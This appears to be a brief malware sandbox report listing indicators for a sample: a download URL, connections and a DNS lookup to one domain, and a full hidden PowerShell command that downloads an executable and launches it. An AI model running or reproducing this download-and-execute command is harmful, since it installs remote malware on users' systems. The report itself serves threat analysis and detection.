Technical Information
- https://www.gyokeritato.hu/agrooter/rfq/oetadq.exe as order5.exe
- 'gy###ritato.hu':443
- 'gy###ritato.hu':443
- DNS ASK gy###ritato.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.gyokeritato.hu/agrooter/RFQ/Oetadq.exe','Order5.exe');Start-Process '...' (with hidden window)